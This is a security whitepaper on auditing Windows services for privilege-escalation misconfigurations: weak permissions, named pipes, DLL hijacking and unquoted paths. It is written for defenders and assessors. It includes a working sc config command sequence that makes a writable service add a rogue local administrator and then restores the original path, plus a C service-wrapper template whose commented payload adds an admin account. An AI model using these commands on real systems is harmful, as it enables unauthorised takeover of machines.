Windows Services - All Roads Lead To System: Kostas Lintovois
Windows Services - All Roads Lead To System: Kostas Lintovois
Windows Services - All Roads Lead To System: Kostas Lintovois
to SYSTEM
Kostas Lintovois
Version 1.1 - 1st October 2015
1. Introduction ..................................................................................... 3
1.1 Windows Service Accounts ............................................................................... 4
2. Auditing Windows Services .................................................................... 5
2.1 Insecure File System Permissions ....................................................................... 5
This article discusses the implications of misconfigurations of Windows Services. These are often discovered in
today’s applications and could result in arbitrary code execution and the escalation of privileges. In fully
patched Windows environments, a badly implemented service is among the most common attack vectors an
attacker can pursue.
A Windows Service is a program that is not tied to any interactive user sessions and consists of at least one
binary file. Services are analogous to UNIX daemons. They can be implemented as system drivers or as
executables/DLLs and can be configured to start at different stages of the boot process. Examples of Windows
Service types are kernel drivers, file system drivers, services which run in their own process and services which
share the same process with others. The following sc command shows the properties of the http service. This is
an example of a driver service implementing the HTTP protocol stack.
C:\Windows\system32>sc qc http
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: http
TYPE : 1 KERNEL_DRIVER
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : system32\drivers\HTTP.sys
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTTP
DEPENDENCIES :
SERVICE_START_NAME :
By contrast, the following is an example of a typical Windows Service using its own binary which resides in a
user defined directory. This is a standard service that will be displayed in the MMC Windows Services console:
C:\Windows\system32>sc qc usersvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usersvc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\servicedir\svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : UserService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The Service Control Manager (SCM) is the key component of the operating system responsible for providing a
management interface to services.
In order for a service to operate successfully, a system or a user account needs to be associated with it. Most
often services run under the context of the following built-in system accounts:
Network Service
Local Service
However, they can also run under the context of any other user account. The decision on the type of the
account a service is associated with, is key for the security posture of the service and consequently the
system’s. From a security perspective, the account under which a service runs is crucial. This is because the user
account permissions on the system dictate what resources the service can access and what operations it can
perform. Consequently, if the service gets compromised, any code would run under the same context as the user
that the service is associated with. A very common mistake often observed in Windows Services is related with
this choice. A service should always follow the least privilege principle and the chosen account should just have
the permissions necessary for it to operate.
In many cases, particularly in enterprise software where Windows Services support the applications, a service
account is required on the system where they are installed. A common misconception is that these accounts
should be added to an Administrative group (Local or Domain), due to the belief that only Administrators can
start and stop services. This is not the case as non-administrative users can explicitly be given the required
permissions to perform their tasks on a particular service, but not on every service, which is the case for
administrators. This way, in the event of a compromise, it won’t be possible for the attacker to gain complete
control of the system, because the service account is not privileged.
When a service compromise occurs, the payload runs in the context of the service account. If this account is the
SYSTEM or an Administrative account which then escalates to SYSTEM, the attacker can retrieve from the
system’s memory the plaintexts credentials from all the user sessions (interactive and non-interactive) on the
system. Additionally the SYSTEM level access enables the retrieval of the local system’s NTLM hashes. Due to the
way authentication works in Windows environments, hashes and plaintext passwords are treated equally and as
such either can be used to authenticate to other resources on the network. The lack of the requirement to crack
the hashes could make the compromise spreading much faster. Thus it is important to always follow the least
privilege principle when choosing this account.
A service should never run under a domain administrative account and also consideration should be taken if a
standard domain account has to be associated with it. A dedicated local service account, which will be dictated
by the same permissions as any other standard user on the system where the service operates, and explicitly
assigned with only the required permissions, is a secure base to build upon. This can be extended in further
hardening, so to minimise the exposed attack surface. If however a domain account is required, then a policy
which restricts access to any resources irrelevant to the service should be applied.
The rest of this document describes some service areas which could be abused, if security best practice is not
followed, resulting in arbitrary code execution and/or privilege escalation.
The following sections detail common errors in configuring Windows Services, and how to check for these.
A service binary as with any other file on the system, resides within a directory, it has a number of access
permissions and it might inherit additional permissions from its parent container. There are two common
misconfigurations often identified in this area:
The directory which contains the service binary has been either explicitly set weak permissions or has
inherited insecure permissions from its parent container
The binary itself has been explicitly set with weak permissions
The first flaw is normally discovered in multi user applications. Because of the way they are often implemented,
they may not correctly store individual user data, e.g. by utilizing the %APPDATA% environment variable. Instead
they opt to use the current working directory of the binary and so the permissions on this folder need to be
relaxed so that all users can write to this folder. Overwriting the service binary or its DLLs, may enable users to
run arbitrary code in the context of the service account. The following example shows insecure permissions set
on the service directory, as the “Everyone” group has full access on it.
In this case, the binary file (svc.exe) inherits the permissions from the parent directory as the (I) indicates.
When it comes to auditing these services, all directories and files should be checked, even if they are contained
within a parent directory which does have its permissions properly set. An example of enterprise software where
service binary permissions were set insecurely was found in an earlier version of Symantec's pcAnywhere [1].
Another common failure of file system permissions is related to inheritance. Even if the service installer hasn’t
explicitly set relaxed permissions on the service binary and directory, if inheritance is enabled, weak
permissions might be enforced.
By default in Windows, regular users are not allowed to create files or directories directly under the file system
root. However, they have APPEND_DATA rights on an already existing directory, allowing file overwrites. Some
installers do not change the permissions if the user decides to install the software under the file system root. If
C:\>cacls DangerousService
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
CREATOR OWNER:(OI)(CI)(IO)(ID)F
The built-in Users group has append and write access on this directory. In some Windows versions, the output of
the cacls command can sometimes be different from the previous and similar to the following:
C:\>cacls DangerousService
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
In this case the “Authenticated Users” group has change rights on the directory as the (C) at the end of the line
indicates.
A handy native Windows command that returns, amongst other information, the binary paths of all the services
is the following:
The above command can also run remotely; however, it should run under a user who has administrative level
access on the target system. When it is run locally, any user level is sufficient.
After the identification of these paths, for each one of them, a command like cacls or icacls should be run
against both the binary and the parent directory in order to review their access rights. Windows Services will
likely be located under the System32 directory where standard users have read only access. User application
services will most commonly be deployed to the “Program Files” directory. Priority should be given to any
service binary paths which are not located within the above directories.
Insecure permissions can also be found in the registry keys associated with a service. As with any other securable
object in the system, registry keys have DACLs (Discretionary Access Control Lists). When a service is registered
with the system, a new key is created under the following registry path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
The following image shows the default registry entries that describe the service and were generated by Windows
upon the service’s creation:
The following image shows the access permissions of the service’s registry key:
In this instance we observe that the members of the “Authenticated Users” group have been assigned with “Full
Control” over the key. Any authenticated user could compromise the service and escalate privileges by
modifying the string of the ImagePath value to point to a binary of their choosing.
Other built-in groups, such as Everyone and Users, as well as any user defined groups which contain low privilege
users, should be examined. Additionally nested group memberships should be evaluated as they may lead again
to weak permissions. In order to query for all the users/groups that have write access to the services key and its
subkeys, run the following command:
Insecure registry permissions are less likely to be present due to the fact that by default Windows grant write
access to the services registry key only to administrative level users. However, it is recommended that this part
of the system is always covered in service assessments.
Another service element that can be abused, in attempt to escalate privileges or execute arbitrary code, are any
named pipes which may be associated with it. As with any other securable object in Windows, the system
performs an access check before granting access to the object. Similar to the file system permissions, in a
named pipe’s Discretionary Access Control List (DACL) may offer an interface to the system in the context of the
service account. For more information on Named Pipe security and access rights, refer to this MSDN article.
A quick way to assess named pipe access rights is with SysnternalsProcess Explorer [3]. Once running, switch to
Handle view and from the lower pane select the named pipe object. The following example shows the
permissions of the vmware-authdpipe object for the VMware Authorisation service (vmware-authd.exe).
The DACL is present and contains one entry (Authenticated Users). After examining another service we get the
following result.
In this instance, we see that the Orange mobile broadband service which runs under the SYSTEM account
implements a named pipe (\Device\NamedPipe\OrangeMobileBroadband_Service) with an empty DACL.
A tool for quickly examining named pipe access rights is called pipesec [4]. In recent Windows versions it should
be executed from an elevated shell. Running the tool without any parameters lists all the named pipes of a
system. Providing a specific named pipe as an argument returns that pipe’s access rights.
Windows Services, just as files or other securable objects, have a DACL associated with them that dictates what
actions users or groups can perform. Windows natively allows the review and/or modification of these
permissions through Microsoft’s Management Console Security Configuration and Analysis snap-in. The following
screenshot shows the service access rights of the Print Spooler service.
Similarly to file access rights, selecting the “Advanced” view returns a full listing of each individual service
access rights.
This will return the DACLs of every service. If one in particular is to be audited the following can be run instead:
An example of an insecure access assignment follows, where the "Authenticated Users" group is allowed to
change the service's configuration and restart the service.
badsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_PAUSE_CONTINUE
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
A direct privilege escalation attack is possible if the service runs under a higher privileged account than the
user. It is worth noting that with this level of access to the service, a user could alter the service's logon account
to LOCAL SYSTEM. This would ensure that the highest privilege level is obtained on the host. However, this
decision depends on the objectives. If the Windows domain is targeted then it is often preferable to keep the
service running under a domain user's context, as this provides more access to domain resources.
C:\>sc qc badsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: badsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\DangerousService\insecure.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : badsvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
To exploit the issue, any user who is successfully authenticated with the system could run the following set of
commands to add a new local administrator that they control and then clean up:
C:\>sc config badsvc binpath= "cmd /c net user hacker S3cr3t /add"
C:\>sc stop badsvc
C:\>sc start badsvc
C:\>sc config badsvc binpath= "cmd /c net localgroup administrators hacker /add"
C:\>sc stop badsvc
C:\>sc start badsvc
C:\>sc config badsvc binpath= "C:\DangerousService\insecure.exe"
C:\>sc stop badsvc
C:\>sc start badsvc
Another issue linked to Windows Services that could potentially enable an attacker to execute arbitrary code
under the context of the service account is related to Dynamic Link Libraries (DLLs). As with any other Windows
binary, when a service binary runs it requires a number of DLLs to function properly. These DLLs are mapped
into the service process memory space at runtime. However, sometimes for various reasons (e.g. code
debugging, backwards compatibility, bad coding practices), an application tries to load DLLs in an insecure way.
This includes DLLs that might not exist on the system or those that are called without using a fully qualified
path. This opens a window of opportunity for the service to be compromised and potentially for privileges to be
escalated. By default in Windows when an application loads a DLL by name, the system will search for it in a
predefined directory list which is called DLL search order. In 32bit Windows the search order is the following:
If the permissions in any of the above directories are not properly set, a user with write access on them could
drop a DLL, containing arbitrary code, named the same as the expected DLL to be executed when it is loaded by
the service. This attack is known as DLL highjacking. More details for the Windows DLL search order can be
found in this MSDN article [6]. It also offers a more stealthy persistence mechanism the DLL is loaded in the
context of an existing service. Additionally it could potentially bypass integrity monitoring software as it does
not involve modification of existing files, which would be detected.
From an auditing perspective, at a permission level, it is important that all directories of the DLL search order
be assessed, with particular attention to the members of the PATH variable (System and User) and the current
working directory. The following image highlights Java JDK’s binary directory that is contained in the System’s
PATH variable:
In order to detect DLL calls directly from the binary, the Sysinternals Process Monitor [7] application offers a
quick way to audit a binary at runtime for various read and write operations, including file system calls. By
setting a filter for the service process name and monitoring the file system operations, we observe the failed
attempt as ‘FILE_NOT_FOUND’ in the results column. This allows us to identify calls to missing DLLs. In the
example below the service attempts to load “symcagntctl.dll” but the file is not found on the system.
The highlighted part of the output shows Windows going through the DLL search order, including the JDK’s
binary directory.
The service binary and DLLs should also be examined using static and dynamic analysis techniques. The analysis
can provide information that the above method cannot, such as missing DLL dependencies of existing DLLs that
occur upon the service’s startup. In [8] the DLL hijacking technique is described, taking the example of the
failed attempt of the “IKE and AuthIP IPsec Keying Modules” service to load wlbsctrl.dll on a Windows 7 build.
This is the issue exploited by Metasploit’s ikeext_service module [9].
Another common misconfiguration that can be found in Windows Services is related to unquoted paths that
contain spaces. The issue arises because of the way Windows interprets such paths. If the path is not enclosed in
quote marks, its interpretation becomes ambiguous. The operating system will first attempt to run the binary
from the path ending at the first space character, then the second, and so on. For example, when the following
service is started:
Windows would attempt to execute the highlighted in bold binaries in the following order:
1. C:\Program.exe
2. C:\Program Files\Service.exe
MSDN’s page for the CreateProcess API function [10] gives more details about the issue, at the section where the
lpApplicationName parameter is described. Successful exploitation takes advantage of the logic flaw in the way
that the lpApplicationName parameter is handled. This has been a known issue for some time now, but it hasn’t
been fixed as it is probably related to core system internal functions and as such it is considered normal
behaviour. The following example demonstrates a service that contains a space in the binary path and is not
enclosed within quotes.
C:\>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Service Directory\launcher svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : UnquotedSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
If an attacker could copy a file called service.exe or launcher.exe and place it on C:\ or C:\Service
Directory\launcher.exe respectively, this would cause Windows to run the malicious executable in the user
context of the service account at the next service restart. For this attack to succeed, the attacker must have
write access to any directories along the path to the binary, in order to be able to drop the executable with the
proper name and gain code execution. So there are two requirements for the attack to succeed. The Metasploit
Framework includes the following post exploitation module:
exploit/windows/local/trusted_service_path
This module enables an attacker to potentially escalate privileges by exploiting unquoted service binary paths.
It is recommended that all paths to services are enclosed in quote characters. This will ensure Windows will only
attempt to locate the binary at the desired path. In order to review the services for unquoted binary paths, the
following wmic command can be used locally on a system by both low and high privileged users:
The above output shows a quoted and an unquoted binary path of two different services. The command can also
run remotely but in this case administrative level of access is required:
From the above output the user can quickly identify which binary paths are not quoted, in order to proceed with
the fix. For this vulnerability, the fix is straightforward: it does not require any code modifications and can be
applied manually. One can navigate under the following registry location where Windows keeps an entry for
every service registered with the system:
HKLM\System\CurrentControlSet\services
Then find the service in question and change the value of the corresponding “ImagePath” key to be enclosed
within double quotes.
C:\>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Service Directory\launcher svc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : UnquotedSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The exploitation of most flaws in a service that have been described so far involves the replacement of the
service binary either by overwriting the file or by changing the service’s configuration. Windows services require
the use of specific functions and structures which produce a binary in a format that the Windows Service
Manager expects. Using arbitrary executables results in unreliable execution because the Windows Service
Manager may kill processes that do not respond in the expected manner. It is therefore recommended to use
binaries that adhere to the service definition.
The Metasploit framework can produce such binaries on the fly, using the exe-service type in the msfvenom or
with Metasploit’s console generate command. However in some more complex scenarios, such as custom
payloads or non-networked systems, the Metasploit payloads do not offer enough flexibility. Also without any
obfuscation they are detectable by Anti-Virus software due to the known stubs. Using a service wrapper instead,
can deal with these issues easier. The following C code is an example of such a wrapper.
#include <windows.h>
#include <stdio.h>
#define SLEEP_TIME 5000
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
int Run()
{
/* Code goes here e.g.
system("net user servicetest Secret /ADD");
system("net localgroup Administrators servicetest /ADD");
return 0;
*/
}
int main()
{
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = "ServiceNameGoesHere";
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
hStatus = RegisterServiceCtrlHandler("ServiceNameGoesHere",
(LPHANDLER_FUNCTION)ControlHandler);
Run();
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
When it comes to Windows Services, a number of misconfigurations and bad security practices can offer an
attacker the opportunity to execute arbitrary code and escalate privileges. On fully patched systems, this vector
can be an attacker’s best bet. This article has sought to describe the most common implementation pitfalls of
Windows Services, excluding memory corruption vulnerabilities, and to demonstrate how to identify them.
As we’ve seen, there are a number of ways in which misconfigured services could be compromised. There are
five main areas related to the implementation of a service that can impact on the security of a system:
Service permissions
Missing DLLs
Successful exploitation results in arbitrary code execution whilst bypassing most of the protections that the
operating system enforces. Understanding the importance of this part of the system and the impact it has on the
overall security posture, as well as how to assess it, is key to both attack and defence perspectives.
[1] Symantec pcAnywhere insecure file permissions local privilege escalation (CVE-2011-3479). Available:
http://www.exploit-db.com/exploits/18823
[5] WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution. Available:
https://labs.mwrinfosecurity.com/advisories/2013/02/27/webtogo-3g-dongle-software---named-pipe-arbitrary-
command-execution
[9] IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL Metasploit module. Available:
http://www.rapid7.com/db/modules/exploit/windows/local/ikeext_service